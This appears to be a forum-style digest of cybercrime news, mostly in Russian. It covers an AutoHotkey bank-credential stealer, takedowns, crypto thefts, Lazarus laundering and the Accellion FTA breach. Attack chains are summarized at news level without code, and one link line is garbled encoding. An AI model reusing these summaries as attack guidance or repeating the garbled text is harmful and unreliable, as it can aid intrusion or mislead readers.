Threat actors have been discovered distributing a new credential stealer written in AutoHotkey (AHK) scripting language as part of an ongoing campaign that started early 2020.
Customers of financial institutions in the US and Canada are among the primary targets for credential exfiltration, with a specific focus on banks such as Scotiabank, Royal Bank of Canada, HSBC, Alterna Bank, Capital One, Manulife, and EQ Bank. Also included in the list is an Indian banking firm ICICI Bank.
AutoHotkey is an open-source custom scripting language for Microsoft Windows aimed at providing easy hotkeys for macro- creation and software automation that allows users to automate repetitive tasks in any Windows application.
The multi-stage infection chain commences with a malware-laced Excel file
that's embedded with a Visual Basic for Applications (VBA)
[AutoOpen](https://docs.microsoft.com/en-
us/office/vba/word/concepts/customizing-word/auto-macros) macro, which is
subsequently used to drop and execute the downloader client script ("adb.ahk")
via a legitimate portable AHK script compiler executable ("adb.exe").
The downloader client script is also responsible for achieving persistence,
profiling victims, and downloading and running additional AHK scripts from
command-and-control (C&C) servers located in the US, the Netherlands, and
Sweden.
What makes this malware different is that instead of receiving commands directly from the C&C server, it downloads and executes AHK scripts to accomplish different tasks.
"By doing this, the attacker can decide to upload a specific script to achieve customized tasks for each user or group of users," Trend Micro researchers [said](https://www.trendmicro.com/en_us/research/20/l/stealth-credential- stealer-targets-us-canadian-bank-customers.html) in an analysis. "This also prevents the main components from being revealed publicly, specifically to other researchers or to sandboxes."
Chief among them is a credential stealer that targets various browsers such as Google Chrome, Opera, Microsoft Edge, and more. Once installed, the stealer also attempts to download an SQLite module ("sqlite3.dll") on the infected machine, using it to perform SQL queries against the SQLite databases within browsers' app folders.
In the final step, the stealer collects and decrypts credentials from browsers and exfiltrates the information to the C&C server in plaintext via an HTTP POST request.
Noting that the malware components are "well organized at the code level," the researchers suggest the inclusion of usage instructions (written in Russian) could imply a "hack-for-hire" group that's behind the attack chain's creation and is offering it to others as a service.
"By using a scripting language that lacks a built-in compiler within a victim's operating system, loading malicious components to achieve various tasks separately, and changing the C&C server frequently, the attacker has been able to hide their intention from sandboxes," the researchers concluded.
Международная операция ликвидировала зашифрованную платформу MATRIX, используемую преступниками
03 декабря 2024 года международные правоохранительные органы ликвидировали зашифрованную платформу MATRIX, предоставляющую услуги связи, активно используемые преступными группировками.
Платформа MATRIX, также известная под названиями Mactrix, Totalsec, X-quantum и Q-safe, представляла собой закрытый сервис, созданный специально для преступников. Ликвидация стала возможной благодаря совместной работе правоохранительных органов Франции и Нидерландов, при поддержке Италии, Литвы, Испании и Германии, а также координации Europol и Eurojust.
MATRIX — это зашифрованная платформа для обмена сообщениями, которая привлекла внимание из-за широкого использования среди организованных преступных группировок. Изначально обнаруженная нидерландскими властями на устройствах осуждённых преступников, она быстро стала популярной среди тех, кто занимается незаконной деятельностью, благодаря своим передовым функциям безопасности и децентрализованной инфраструктуре.
MATRIX была разработана с акцентом на конфиденциальность. Платформа использовала сквозное шифрование, что означало, что только получатели могли получить доступ к сообщениям. В отличие от централизованных платформ, пользователи могли хостить свои собственные серверы, что значительно усложняло правоохранительным органам мониторинг или блокировку её работы.
Платформа также привлекала дополнительные функции, такие как доступ с нескольких устройств, беспрепятственное взаимодействие между пользователями на разных серверах и интеграция с другими мессенджерами. Эти возможности сделали MATRIX популярной среди киберпреступников, которые искали безопасный и гибкий способ общения.
Однако, несмотря на свою надёжную инфраструктуру, участие MATRIX в криминальных операциях привлекло внимание международных правоохранительных органов. В рамках скоординированных усилий власти ликвидировали её серверы, что стало важным шагом в борьбе с каналами связи организованных преступных групп.
Сотрудничество между Францией и Нидерландами началось с создания совместной следственной группы (JIT) при поддержке Eurojust. Используя новейшие технологии, правоохранители смогли получить доступ к переписке пользователей MATRIX. В течение трёх месяцев они перехватывали и расшифровывали сообщения, общее число которых превысило 2,3 миллиона. Эти сообщения были написаны на 33 языках и содержали данные о серьёзных преступлениях, включая международную торговлю наркотиками, оружием и отмывание денег.
3 декабря 2024 года прошли совместные действия в четырёх странах. В ходе операции:
Преступникам, пользовавшимся платформой, было отправлено уведомление об её ликвидации через специальное сообщение на экране входа. Данные, перехваченные за три месяца, теперь будут использоваться для дальнейших расследований.
Международное сотрудничество позволило нанести серьёзный удар по организованной преступности. Правоохранительные органы установили не только ключевых пользователей платформы, но и коррупционеров, которые обеспечивали обход таможенного и полицейского контроля. Это помогло разоблачить всю цепочку организации преступной деятельности, от производства наркотиков до их распространения.
После ликвидации Sky ECC, EncroChat, Exclu и Ghost преступники начали искать менее известные или собственные решения для общения. MATRIX стал одной из таких платформ, однако её ликвидация демонстрирует, что правоохранительные органы продолжают адаптироваться к новым технологиям и находят способы борьбы с киберпреступностью.
Ликвидация MATRIX показала эффективность международного сотрудничества в борьбе с организованной преступностью. Раскрытие этой платформы и перехват миллионов сообщений стали важным шагом к пресечению преступной деятельности, угрожающей безопасности граждан по всему миру.
Сотрудники Управления кибербезопасности СБУ выявили и приостановили деятельность межрегионального конвертцентра на Житомирщине, который скрытно функционировал в период 2020-2021 годов. С его помощью злоумышленникам удалось нелегально вывести в тень более 200 млн грн. В отношении «работников» конвертцентра оперативники отрабатывают версию финансирования террористических бандформирований из т.н. «ДНР».
В ходе проведения оперативных действий было установлено, что к организации центра причастны киевлянин и трое жителей Житомирской области. Основными видами деятельности нелегального конвертационного центра были минимизация налогов, легализация доходов и перевод денег в кеш. Услугами центра пользовались несколько десятков коммерческих фирм из Житомирской, Киевской и Донецкой областей.
Цепочка подставных юрлиц, через которые прогонялись деньги, состояла из 40 фиктивных предприятий. Также преступники привлекли к своей незаконной деятельности несколько сотен физлиц, на чьи имена в банках оформлялись платежные карты, через которые проходили денежные средства. За одну операцию дельцы перечисляли не более 400 тыс грн.
Уголовное дело возбуждено по двум статьям УК Украины: ч. 1 ст. 258-5 (финансирование терроризма) и ч. 2 ст. 205-1 (подделка документов, предоставляемых для проведения государственной регистрации юрлиц- и физлиц- предпринимателей).
На этой неделе Госдума приняла во вторник в третьем, заключительном чтении законопроект о конфискации денег и имущества, полученных в результате киберпреступлений. Проект закона нацелен «на повышение эффективности мер по противодействию преступлениям, совершаемым в сфере компьютерной информации».
Документ был внесен в палату 18 ноября 2022 года группой парламентариев во главе с председателем думского комитета по безопасности и противодействию коррупции Василием Пискаревым и главой комитета Совфеда по конституционному законодательству и госстроительству Андреем Клишасом. Первое чтение законопроекта состоялось еще 9 февраля.
Изменения будут внесены в ст. 104.1 Уголовного кодекса РФ (конфискация имущества), которая теперь будет дополнена положением о конфискации денег, ценностей и иного имущества, полученных при совершении преступлений по статьям 273 (создание, использование и распространение вредоносных компьютерных программ), 274 (нарушение правил эксплуатации средств хранения, обработки или передачи компьютерной информации), 274.1 (неправомерное воздействие на критическую информационную инфраструктуру РФ).
Кроме того, конфискация вводится по статье 272 УК РФ (неправомерный доступ к компьютерной информации), если преступление повлекло крупный ущерб или совершено из корыстной заинтересованности, совершено группой лиц по предварительному сговору, организованной группой либо лицом с использованием своего служебного положения, а также если преступление повлекло тяжкие последствия или создало угрозу их наступления.
В пояснительной записке к документу сообщается, что количество совершаемых в России компьютерных преступлений ежегодно растет. Согласно статистическим данным МВД России, в 2021 году совершено 6354 преступления в сфере компьютерной информации, что на 62,5% больше чем за аналогичный период прошлого года (в 2020 году — 3973 преступления).
«Согласно статистическим данным МВД России в настоящее время в Российской Федерации каждое четвертое преступление совершается с использованием информационно-коммуникационных технологий или в сфере компьютерной информации.
При этом большинство из таких преступлений совершено с использованием сети «Интернет», средств мобильной связи, компьютерной техники и программных средств», — гласит пояснительная записка.Click to expand...
Минчанин попросил посредника обналичить биткоины и остался без денег.
В милицию обратился мужчина, который занимается сделками с криптовалютой, и рассказал, что стал жертвой обмана. Он решил обналичить виртуальные деньги и попросил о помощи своего знакомого — клиента нужного банка. Для этого он перевел на счет приятеля криптовалюту, чтобы тот снял белорусские рубли.
Мужчины приехали к отделению нужного банка. Сам потерпевший остался ждать в машине, отправив внутрь одного знакомого. Сняв со счета 58 тысяч рублей, посредник переоделся, вышел через другую дверь и уехал на такси.
Сотрудники милиции задержали 21-летнего минчанина. При нем обнаружили часть похищенных денег, остальное он потратил на казино и развлечения. Возбуждено уголовное дело за кражу в особо крупном размере. Парню грозит до 12 лет лишения свободы.
source: t.me/police_minsk/9045
Управление по борьбе с оргпреступностью и терроризмом Румынии арестовало жителя города Крайова по подозрению во взломе «седьмого по величине криптовалютного оператора в мире», базирующегося на Кайманах.
38-летнему парикмахеру Ионелю Роману инкриминируют взлом, мошенничество в сфере высоких технологий и отмывание денег. По словам следователей, после успешной атаки он обменял похищенные эквивалент $620 000 в криптовалюте на фиат и стал выводить партиями по 10 000 румынских лей ($2449) для обхода требований идентификации личности.
В доме Романа в качестве улик изъяли семь мобильных телефонов, три ноутбука, пять карт памяти, два электронных кошелька, 10 800 леев наличными и 40 000 леев на счете одного из обменников.
Обвиняемого доставили в суд города Яссы, его предварительно арестовали на 30 дней.
• Source: <https://www.diicot.ro/mass-media/3042-comunicat-de- presa-05-03-2021>
6 марта сообщество PeopleDAO, созданное с целью приобретения редкого экземпляра Конституции США, подверглось хакерской атаке. Ущерб составил 76,5 ETH ($120 000).
Как стало известно, бухгалтерия PeopleDAO по ошибке выложила ссылку на Google- таблицу с формой ежемесячных выплат на публичном Discord-канале. У документа были открыты права редактирования. Неизвестный вписал в него адрес своего кошелька и сумму платежа в размере 76,5 ETH, после чего сделал эту строку невидимой.
В дальнейшем хакер перевел 69,2 ETH на биржу HitBTC и 7,3 ETH — на Binance. Обе торговые платформы наряду с правоохранительными органами уведомлены об инциденте.

PeopleDAO также проводит внутреннее расследование с экспертами по блокчейн- безопасности ZachXBT и SlowMist. Сообщество предложило хакеру вознаграждение за возврат средств в размере 10% от похищенной суммы. На момент написания он не ответил на предложение.
Отдельно команда займется совершенствованием бухгалтерского учета и обучением валидаторов работе с мультиподписями.
Source: forklog.com/news/u-peopledao-pohitili-120-000-v-ethereum-cherez- google-tablitsu
Интерпол сообщает, что в ходе операции HAECHI-I, длившейся с сентября 2020 года по март 2021 года в Азиатско-Тихоокеанском регионе, были перехвачены 83 000 000 долларов, принадлежащие жертвам финансовых преступлений. Благодаря стараниям правоохранителей, эти деньги не попали на счета мошенников.

В операции HAECHI-I принимали участие более 40 сотрудников правоохранительных органов, специализирующихся на борьбе с киберпреступностью в Азиатско- Тихоокеанском регионе. В данном случае они сосредоточились на пяти основных видах финансовых преступлений: инвестиционном мошенничестве, «романтическом» мошенничестве, отмывании денег, связанном с незаконными азартными играми, сексуальным вымогательством (англ. термин sextortion, образован от слов sex — «секс» и extortion — «вымогательство»), а также голосовым фишингом.
Сообщается, что агенты Интерпола провели более 1400 расследований в Азиатско- Тихоокеанском регионе (в таких странах как Камбоджа, Китай, Индонезия, Корея, Лаос, Филиппины, Сингапур, Таиланд и Вьетнам), при этом 892 дела уже раскрыты. По итогам было произведено 585 арестов, а более 1600 банковских счетов, принадлежащих преступникам, были заморожены.
«Интернет-мошенники часто пытаются использовать безграничность интернета, нацеливаясь на жертв в других странах или переводя незаконные средства за границу. Результаты операции HAECHI-I демонстрируют, что финансовые преступления в интернете носят глобальный характер, и только благодаря тесному международному сотрудничеству мы можем эффективно бороться с такими нарушениями», — резюмируют в Интерполе.
Click to expand...
Источник: xakep.ru/2021/05/31/haechi-i/
Из-за подлой атаки врачам пришлось отменить все операции и срочно перевести пациентов в другие больницы.
Как [сообщает](https://www.francetvinfo.fr/internet/securite-sur- internet/cyberattaques/info-franceinfo-l-hopital-andre-mignot-du-centre- hospitalier-de-versailles-victime-d-une-cyberattaque_5522235.html) издание Franceinfo, в выходные знаменитая учебная больница Андре Миньо подверглась кибератаке, которая вынудила учреждение отключить все компьютерные сети. Это привело к отмене всех операций и переводу некоторых пациентов в другие больницы.
Министр здравоохранения Франции Франсуа Браун подтвердил сообщения о кибератаке и заявил, что больница была переведена в режим чрезвычайного положения, чтобы данные не попали в руки хакеров. Сейчас все силы персонала направлены на поддержку работы амбулаторных служб и отделения скорой помощи, так как там требуется больше людей для контроля критически важной аппаратуры, которая больше не объединена в сеть.
Сообщается, что все экраны больничных компьютеров оказались заблокированы, из- за чего администрация временно ограничила прием пациентов и оставила компьютерную систему отключенной в целях безопасности.
И несмотря на то, что в сообщениях СМИ не было никаких технических деталей, специалисты считают, что инцидент был делом рук хакеров. Кроме того, пока неизвестно, удалось ли злоумышленникам украсть какие-либо данные в ходе кибератаки.
Девятиклассник и студент техникума контролировали логистику, вербовали курьеров и управляли интернет-магазином по продаже запрещённых веществ. Их преступная организация состояла из четырёх крупных подразделений и действовала с сентября по октябрь 2024 года.
— Ранее они занимались незаконной реализацией курительных смесей и парогенераторов. Вместе с ними были задержаны ещё четверо участников группировки.
iz.ru/1794807/ivan-petrov/severnye-nadbavki-podrostki-organizovali- narkokartel-na-kolyme
Федеральная служба безопасности (ФСБ) потребовала у российских операторов
связи запретить предоставлять клиентам возможность использовать VoIP-аккаунты
как с иностранных IP-адресов, так и принадлежащих российским провайдерам
хостинга.
Гендиректор Piter-IX Николай Метлюк пояснил, что сейчас клиенты операторов
связи все чаще получают виртуальные номера (те, которые можно использовать не
в том регионе, на который указывает префикс) и арендуют виртуальные АТС
(онлайн-сервис для организации звонков между компанией и клиентами) для
оказания услуги телефонии, причем за рубежом арендовать их было дешевле. «При
этом трафик через виртуальную АТС уходит непонятно куда, если ею пользуются
мошенники, их невозможно отследить, — говорит Метлюк. — Если операторы начнут
выполнять инструкцию из письма, это должно помочь в борьбе с мошенниками».
Как считает гендиректор Piter-IX, добропорядочные клиенты вряд ли ощутят на
себе последствия решения ФСБ: они смогут приобретать услугу виртуальной АТС в
России, а не за рубежом, а разница в стоимости не должна быть чувствительной.
При этом подобный способ борьбы с мошенниками он назвал «жестким».
Глава хостинг-провайдера «Русоникс» Константин Анисимов рассказал, что инициатива ведомства направлена на продолжение борьбы с мошенниками. «То, что мера коснулась российских хостингов, может означать, что идея вводить белые списки адресов российских хостеров, которые гарантировано идентифицировали клиента, провалилась. Взаимодействовать с несколькими сотнями небольших провайдеров непросто», — объяснил он.
Ð´Ð»Ñ Ð¿Ð¾Ð»ÑзоваÑелей IP-ÑелеÑонии из-за моÑенников ](https://lenta.ru/news/2024/07/04/fsb-potrebovala-vvesti- novye-ogranicheniya-dlya-polzovateley-ip-telefonii-iz-za-moshennikov/)
lenta.ru
Северокорейский хакерский коллектив Lazarus, печально известный тем, что на
протяжении многих лет совершал многочисленные крупномасштабные кражи
криптовалют, перешел на использование биткоин-микшера YoMix для отмывания
украденных доходов.
Согласно отчету блокчейн-аналитической компании Chainalysis, Lazarus
адаптировал свой процесс отмывания денег после того, как правительства ввели
санкции против нескольких сервисов по смешиванию биткоинов, которые
использовал злоумышленник. Фирма утверждает, что в течение 2023 года YoMix
наблюдала массовый приток средств, который объясняется не ростом популярности,
а скорее активностью Lazarus.
Операции по отмыванию денег Lazarus
Криптокрад - это лишь один из аспектов деятельности Lazarus, хотя и очень
важная часть ее деятельности, которая, как полагают, финансирует не только
операции группы, но и программу разработки оружия Северной Кореей.
Некоторые из крупнейших операций по краже криптовалют, проведенных Lazarus за
последние годы, включают взлом сети Ronin Network (Axie Infinity) в марте 2022
года, который принес 625 миллионов долларов, взлом Harmony Horizon в июне 2022
года, который привел к убыткам в размере 100 миллионов долларов, и ограбление
Alphapo в июле 2023 года, в результате которого хакеры прикарманили 60
миллионов долларов из криптографии.
Согласно отчету Recorded Future, с января 2017 по декабрь 2023 года
северокорейские хакерские группы, включая Lazarus, Kimsuky и Andariel, украли
криптовалюту примерно на 3 миллиарда долларов.
Деньги проходили через различные сервисы по микшированию монет, которые не
соблюдают правила борьбы с отмыванием денег и принимают депозиты даже с
кошельков, помеченных как подозрительные.
Микшеры передают активы через запутанную сеть держателей криптовалют и
получают их на новые адреса кошельков, которые невозможно отследить до
первоначальных атак.
На протяжении многих лет Управление по контролю за иностранными активами
Министерства финансов США (OFAC) выявляло и санкционировало некоторые
платформы, которые Lazarus использовал для отмывания своих доходов, включая
Blender, Tornado Cash и Sinbad. Однако каждый раз, когда платформа
подвергалась санкциям и изолировалась от криптопространства, Lazarus переходил
на новую. Chainalysis утверждает, что YoMix - это новейший сервис,
используемый северокорейским исполнителем угроз.
Chainalysis сообщает, что во втором квартале 2023 года в YoMix наблюдался
значительный рост средств, который сохранялся до конца года, что в основном
объясняется отмыванием денег.
"Основываясь на данных Chainalysis, примерно треть всех поступлений YoMix
поступила с кошельков, связанных с криптохаками", - говорится в отчете.
"Рост YoMix и его внедрение Lazarus Group является ярким примером способности
опытных участников адаптироваться и находить замену сервисам запутывания,
когда ранее популярные сервисы закрываются" - Chainalysis
Chainalysis также сообщает, что в прошлом году он заметил тенденцию, связанную с концентрацией деятельности по отмыванию денег в нескольких фиатных сервисах, при этом 71,7% всех незаконных средств было направлено всего на пять сервисов. Однако на уровне депозитных адресов отмывание денег стало менее концентрированным, что говорит о том, что преступники диверсифицируют свою деятельность, чтобы избежать обнаружения и замораживания активов правоохранительными органами.
YoMix предлагает не только процент за кошелек, но и время для каждого отдельного кошелька. Что еще больше затрудняет отслеживание.
Оперативники задержали безработного жителя Владимира, который подозревается в хищении 220 тыс. рублей. 30-летний мужчина вскрывал банкоматы, сообщил портал «МВД Медиа» во вторник, 3 января.
Ранее житель Владимира работал в банке. Он занимался сервисным обслуживанием банкоматов. Мужчина уволился в августе 2022 года, но необходимое ключи и комбинации кодов он не вернул. Также владимирец имел игровую зависимость, поэтому он решил воспользоваться моментом и пополнить онлайн-кошелек за счет чужих средств.
Мужчина приходил якобы чинить терминалы в магазинах. Но под маскировкой он вскрывал банкоматы и забирал деньги на сумму от 15 до 55 тыс. рублей. Так, владимирец вскрыл 8 терминалов.
Однако сотрудники полиции задержали 30-летнего мужчину на улице Добросельской. Он подозревается в хищении средств на сумму свыше 220 тыс. рублей. Житель Владимира находится под стражей.
Арест французского криптотрейдера Томаса Клаузи и последующее заключение в тюрьму произошли после того, как женщина, продавшая ему Ferrari за 440 000 долларов в апреле 2021 года, подала жалобу на криптотрейдера, когда цена криптоактива упала до чуть более 30 000 долларов.
21-летний француз и криптотрейдер Томас Клаузи в настоящее время отбывает тюремный срок в Марокко за якобы покупку суперкара стоимостью 400 000 долларов за биткоины. В дополнение к приговору Клаузи к 18 месяцам тюремного заключения марокканский суд также обязал криптотрейдера выплатить штраф в размере более 3,7 миллиона долларов.
Согласно сообщению в СМИ, неприятности для француза начались, когда женщина, которая продала ему Ferrari почти за 440 000 долларов, подала против него дело о мошенничестве. Хотя Клаузи, как утверждается, заплатил всю сумму в апреле 2021 года с помощью BTC, женщина подала жалобу только в июле, когда цена упала. Как показывают данные криптоактива, за этот период стоимость одного BTC упала с более чем 60 000$ в середине апреля до чуть более 31 500$ к 17 июля 2021 года.
Сообщается, что после подачи жалобы власти Марокко, где торговля криптовалютой запрещена законом, начали расследование. К октябрю того же года Клаузи был признан виновным в мошенничестве и «оплате иностранной валютой на марокканской территории». Хотя в декабре цена BTC действительно выросла до более чем 40 000$, марокканские власти были непреклонны и все же отправили француза в тюрьму.
Хотя Клаузи осталось всего несколько месяцев до отбытия наказания, его адвокаты, как сообщается, все еще пытаются добиться его досрочного освобождения. Например, на одном слушании, когда они добивались смягчения его приговора, адвокаты сообщили суду, что Клаузи в прошлом покупал дорогие швейцарские часы, используя криптовалюту, и что впоследствии цена BTC также выросла.
Однако вместо смягчения приговора марокканский суд еще и обязал Клаузи возместить продавцу сумму, эквивалентную 4200$ в местной валюте.
Groove ransomware group is threatening the Ukrainian goverment - demanding they stop extraditing citizens to the United States or else they will begin extortion. They have named the price: $30,000,000
Источник:
Нефтегазовая компания Shell (Royal Dutch Shell), занимающая пятое место в рейтинге Fortune Global 500, стала жертвой взлома из-за атаки на устаревший файлообменный сервис Accellion FTA (File Transfer Application).
Shell раскрыла информацию об атаке в публичном заявлении, обнародованном на официальном сайте. Представители компании уверяют, что инцидент затронул только устройство c Accellion FTA, которое использовалось для безопасной передачи больших файлов.
«Нет никаких признаков какого-либо воздействия на основные ИТ-системы Shell, поскольку служба передачи файлов была изолирована от остальной инфраструктуры Shell», — подчеркивается в заявлении.
Click to expand...
Shell уже уведомила о случившемся соответствующие органы и регуляторов, так как злоумышленники получили доступ к файлам, переданным с помощью скомпрометированного устройства Accellion FTA. Сообщается, что часть этих данных принадлежала заинтересованным сторонам и дочерним предприятиям Shell.
«Shell держит связь с пострадавшими лицами и заинтересованными сторонами, и мы работаем с ними над устранением возможных рисков», — сообщают в компании.
Click to expand...
Напомню, что в прошлом месяце ИБ-специалисты связали атаки на уязвимые установки Accellion FTA с хак-группой FIN11. Аналитики компании FireEye писали, что жертвами злоумышленников на тот момент стали более 100 компаний.
По информации самих разработчиков Accellion, среди примерно 300 клиентов FTA жертвами атак стали «менее 100», а среди них менее 25 пострадали от кражи данных. В FireEye уточняли, что некоторые из этих 25 клиентов подвергаются шантажу, и хакеры требуют у них выкуп.
В рамках этой кампании хакеры эксплуатируют четыре уязвимости в FTA (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103 CVE-2021-27104), а затем устанавливают веб-шелл DEWMODE и используют его для кражи файлов, хранящихся на FTA-устройствах жертв. После этого злоумышленники часто шантажируют пострадавших, требуя выкуп и угрожая слить похищенную информацию в открытый доступ.
Примечательно, что похищенные данные публикуются на сайте, который принадлежит операторам шифровальщика Clop, однако в сетях пострадавших компаний не было зашифровано ни одной машины. То есть все они стали жертвами взлома и классического вымогательства, а не атак шифровальщика.
Разработчики Accellion уже выпустили несколько «волн» исправлений, но каждый раз подчеркивали, что FTA уже давно является устаревшим продуктом, и призывали своих клиентов перейти на новую платформу Kiteworks. В итоге в компании и вовсе заявили, что окончательно прекратят поддержку FTA 30 апреля 2021 года.
Источник: xakep.ru/2021/03/23/shell-accellion/
26 сентября 2022 года экс-сотрудник ЦРУ и Агентства национальной безопасности (АНБ) Эдвард Сноуден официально получил российское гражданство, согласно указу президента РФ от 26.09.2022 № 673 «О приёме в гражданство РФ и выходе из гражданства РФ».
«После стольких лет разлуки с нашими родителями я и моя жена не имеем никакого желания находится в разлуке с нашими сыновьями. После двух лет ожидания и почти десяти лет изгнания немного стабильности пойдёт на пользу моей семье», — написал Сноуден в Twitter.
Бывший сотрудник АНБ Эдвард Сноуден находится в России с 2013 года. Он перебрался в Москву после публикации целого ряда секретных документов Агентства национальной безопасности США, в которых подробно описаны программы массового наблюдения американской разведки. В США Сноудену грозит до 30 лет лишения свободы по обвинению в незаконной передаче сведений, имеющих большое значение для нацбезопасности, передаче разведданных, а также краже государственной собственности.
29 октября 2020 года иммиграционные власти РФ предоставили Сноудену бессрочный вид на жительство. В ноябре 2020 года Сноуден сообщил, что он подаёт на двойное российско-американское гражданство.
В настоящее время Эдвард Сноуден продолжает возглавлять американский фонд «Свобода прессы» (Freedom of the Press Foundation).
Сноуден до сих пор держит в секрете своё конкретное местонахождение и передвижения, но активно рассказывает о проблемах конфиденциальности в своём аккаунте в Twitter. До начала пандемии он был частым гостем технологических конференций по видеосвязи. В 2019 году бывший сотрудник АНБ опубликовал свои мемуары. Американский суд заявил, что доход от продажи книги должен принадлежать государству.
В 2017 году во время нахождения в РФ Сноуден тайно в одном из российских загсов женился на американке Линдси Миллс, с которой на тот момент был знаком более десяти лет. В конце 2020 года у пары родился сын. Сноуден несколько раз опровергал заявления американских спецслужб о том, что работает с их российскими коллегами. За время пребывания в нашей стране Сноуден выучил русский язык.
Адвокат Сноудена Анатолий Кучерена пояснил СМИ, что экс-сотрудник АНБ не подпадает под частичную мобилизацию в России, так как не служил в российской армии. Также адвокат рассказал, что супруга Сноудена собралась подавать заявление на получение гражданства РФ.
Гражданин Испании арестован у себя на родине за организацию конференции о блокчейне и криптовалютах на территории КНДР. Мероприятие способно помочь Северной Корее уклоняться от санкций, уверены правоохранители.
Алехандро Као де Бенос (Alejandro Cao de Benos) был задержан на железнодорожном вокзале Мадрид-Пуэрта-де-Аточа. Как утверждает Министерство юстиции США, в апреле 2019 года Бенос продемонстрировал северокорейским чиновникам, как государство может использовать новейшие технологии для отмывания денег и уклонения от международных санкций. До момента задержания испанец больше года находился в списке самых разыскиваемых преступников Федерального бюро расследований (ФБР) и скрывался в Барселоне под вымышленным именем.
Будучи сторонником северокорейского режима, в 2000 году Бенос основал ассоциацию Korea Friendship Association, а также появлялся в документальных фильмах о КНДР. Минюст США утверждает, что испанец начал планировать конференцию о блокчейне в КНДР еще в 2018 году. Среди участников был бывший разработчик Эфириума Вирджил Гриффит (Virgil Griffith), который тоже был арестован за участие в мероприятии. Еще в 2022 году суд приговорил Гриффита к пяти годам тюремного заключения и обязал выплатить штраф $100 000.
В пятницу, 1 декабря, Бенос предстал перед Высоким судом Испании. Он опроверг
обвинения американской прокуратуры, назвав претензии ложными. Мужчине грозит
до 20 лет заключения в американской тюрьме, однако США пока не начали процесс
экстрадиции.
-----
Адвокат бывшего разработчика Эфириума Вирджила Гриффита направил ходатайство
судье Окружного суда Южного округа Нью-Йорка Кевину Кастелу с требованием
смягчить наказание для своего подзащитного.
В письме адвоката Глена Гаррета МакГорти (Glen Garrett McGorty), защищающего интересы Вирджила Гриффита (Virgil Griffith), содержится просьба пересмотреть приговор. Речь идет о недавно принятых поправках к руководящим принципам вынесения приговоров в США, которые предусматривают снижение уровня правонарушений на два балла для обвиняемых с «нулевым баллом». Это люди, которые впервые совершили ненасильственное правонарушение, и которые, согласно определенным критериям, с меньшей долей вероятности совершат повторное нарушение в будущем.
Эти поправки снизят общий уровень правонарушений Гриффита с 26 до 24, что дает возможность сократить ему тюремный срок хотя бы до 51 месяца. Поэтому адвокат попросил судью обязать правоохранителей пересмотреть отчет о расследовании перед вынесением приговора, назначить повторное слушание дела и подготовить график брифингов, чтобы защита Гриффита могла предоставить обновленную информацию и аргументы для своего запроса о смягчении наказания.
В апреле 2022 года Вирджил Гриффит был приговорен к 63 месяцам тюремного заключения и штрафу в размере $100 000. Он признал вину в нарушении законов о санкциях. Гриффит был осужден за участие в конференции в Северной Корее, где он рассказывал о блокчейне и криптовалютах. Американское правительство утверждает, что Гриффит помогал Северной Корее в использовании технологии блокчейна, несмотря на экономические санкции, введенные Соединенными Штатами.
В мае 2023 года Министерство торговли США также наложило 10-летний запрет на экспортную деятельность Гриффита. Это означает, что ему запрещено участвовать в любых сделках с товарами, программным обеспечением или технологиями, на которые распространяются экспортные правила США.
В декабре 2023 года испанская полиция, по требованию Минюста США, арестовала другого участника той северокорейской конференции — гражданина Испании Алехандро Као де Беноса (Alejandro Cao de Benos). Мужчине грозит до 20 лет тюрьмы в США.
Умер глава крупной российской IT-компании «ИКС Холдинг» Антон Черепенников. Сообщение об этом появилось в официальном Telegram-канале корпорации.
«С большой печалью сообщаем, что 22 июля, в субботу, в возрасте 40 лет ушел из жизни глава "ИКС Холдинга", известный российский технологический предприниматель Антон Черепенников. Предварительная причина — остановка сердца», — сказано в сообщении. Корпорация «ИКС Холдинг» был основана в 2018 году. В ее состав вошли IT-активы Черепенникова — группы компаний «Цитадель» (информационная безопасность и производство систем технических средств для обеспечения функций оперативно-розыскных мероприятий-если короче, то занимался системами прослушки: съема, агрегирования и хранения информации), «Форпост» (системная интеграция и цифровая трансформация крупных предприятий) и «Криптонит» (инвестиции и НИОКР). Кроме того, компания занималась проектами по созданию низкоорбитальной спутниковой системы передачи данных.
В Германии полиция помогла студенту вернуть куст конопли.
С 1 апреля в стране разрешили выращивать траву для использования, чем парень и занялся.
Ночью к челу залезли и украли куст прямо в горшке, но есть одно но: в каждом горшке был AirTag. С помощью него он нашёл дом вора и заявил в полицию.
В полиции отнеслись к делу ответственно, ведь теперь легалайз. Они получили ордер на обыск и изъяли куст — он даже не успел им воспользоваться.
О громком деле теперь пишет вся местная пресса, а полиция получила респект от местных.
По результатам международной спецоперации Офисом Генерального прокурора совместно с работниками Департамента киберполиции Национальной полиции Украины и Главным следственным управлением Национальной полиции, а также правоохранителями Соединенных Штатов Америки и Австралии пресечена деятельность одного из крупнейших в мире фишинговых сервисов для атак на финансовые учреждения разных стран.
По данным следствия, хакер с Тернопольщины разработал поддельный пакет и специальную административную панель к нему, которые были нацелены на вебресурсы банков и их клиентов. Админпанель позволяла контролировать учетные записи пользователей, которые зарегистрировались на скомпрометированных ресурсах и вводили свои платежные данные, которые в дальнейшем получали хакеры. Для демонстрации функционала и продажи своих разработок он создал собственный интернет-магазин в сети DarkNet.
Установлено, что от фишинговых атак пострадали финансовые учреждения Австралии, Испании, США, Италии, Чили, Нидерландов, Мексики, Франции, Швейцарии, Германии и Великобритании. По предварительным данным, убытки достигают десятков миллионов долларов. По результатам анализа иностранных правоохранителей, более 50% всех фишинговых атак в 2019 году в Австралии было осуществлено именно благодаря разработке тернопольского хакера.
Правоохранителями проведено пять санкционированных обысков на территории Тернопольской области, во время которых изъяли компьютерную технику, мобильные телефоны и жесткие диски.
В результате осмотра изъятой компьютерной техники установлено более 200 активных покупателей вредоносного программного обеспечения. По предварительным данным, хакер не только сбывал свою продукцию клиентам со всего мира, но и оказывал техническую поддержку во время осуществления фишинговых атак. Сейчас решается вопрос о сообщение фигуранту о подозрении.
Досудебное расследование в уголовном производстве по фактам несанкционированного вмешательства в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи, а также создание с целью использования, распространения или сбыта вредных программных или технических средств, а также их распространение или сбыта (ч. 2 ст. 361, ч. 2. ст. 361-1 УК Украины) продолжается.
• Source: gp.gov.ua/ua/news?_m=publications&_t=rec&id=288438&fp=10
Гигант кибербезопасности Fortinet подтвердил, что подвергся утечке данных после того, как злоумышленник заявил о краже 440 ГБ файлов с сервера Microsoft Sharepoint компании
